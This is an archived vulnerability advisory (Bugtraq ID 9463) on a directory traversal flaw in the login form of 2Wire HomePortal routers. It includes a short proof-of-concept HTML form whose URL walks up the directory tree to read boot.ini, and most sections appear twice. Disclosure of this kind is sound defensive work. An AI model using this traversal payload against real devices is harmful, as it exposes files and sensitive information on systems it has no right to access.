2Wire HomePortal Series Directory Traversal Vulnerability
BID:9463
Info
2Wire HomePortal Series Directory Traversal Vulnerability
| Bugtraq ID: | 9463 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 20 2004 12:00AM |
| Updated: | Jan 20 2004 12:00AM |
| Credit: | The dislcosure of this issue has been credited to Rafel Ivgi, The-Insider <[email protected]>. |
| Vulnerable: |
2Wire HomePortal 1500W 2Wire HomePortal 100W 2Wire HomePortal 100S 2Wire HomePortal 1000W 2Wire HomePortal 1000SW 2Wire HomePortal 1000S 2Wire HomePortal 1000 |
| Not Vulnerable: | |
Discussion
2Wire HomePortal Series Directory Traversal Vulnerability
It has been reported that the software is allegedly prone to a directory traversal vulnerability that may allow a remote attacker to access information outside the server root directory. This issue is reported to exist in the 'wralogin' authentication form that is accessed through the HTTPS (SSL) interface.
Successful exploitation of this vulnerability may allow a remote attacker to gain access to sensitive information that may be used to launch further attacks against a vulnerable system.
All versions of 2Wire HomePortal Series have been reported to be vulnerable to this issue.
It has been reported that the software is allegedly prone to a directory traversal vulnerability that may allow a remote attacker to access information outside the server root directory. This issue is reported to exist in the 'wralogin' authentication form that is accessed through the HTTPS (SSL) interface.
Successful exploitation of this vulnerability may allow a remote attacker to gain access to sensitive information that may be used to launch further attacks against a vulnerable system.
All versions of 2Wire HomePortal Series have been reported to be vulnerable to this issue.
Exploit / POC
2Wire HomePortal Series Directory Traversal Vulnerability
No exploit is required. The following example was provided:
<form name="wralogin" method="get"
action="http://www.example.com/wra/public/wralogin/?error=61&return=password/../../../../boot.ini">
<input type="hidden" name="authcode" value="MUQmqC/sBiXfslfYEooIJg==">
<center>
<input type="password" name="password" value="">
<input type="submit" alt="Submit" width="58" height="19" border="0"></td>
</form>
</body>
</html>
No exploit is required. The following example was provided:
<form name="wralogin" method="get"
action="http://www.example.com/wra/public/wralogin/?error=61&return=password/../../../../boot.ini">
<input type="hidden" name="authcode" value="MUQmqC/sBiXfslfYEooIJg==">
<center>
<input type="password" name="password" value="">
<input type="submit" alt="Submit" width="58" height="19" border="0"></td>
</form>
</body>
</html>
Solution / Fix
2Wire HomePortal Series Directory Traversal Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
2Wire HomePortal Series Directory Traversal Vulnerability
References:
References:
- 2wire Homepage (2wire)
- 2Wire-Gateway Cross Site Scripting and Directory Transversal bug in SSL Form ("Rafel Ivgi, The-Insider"
)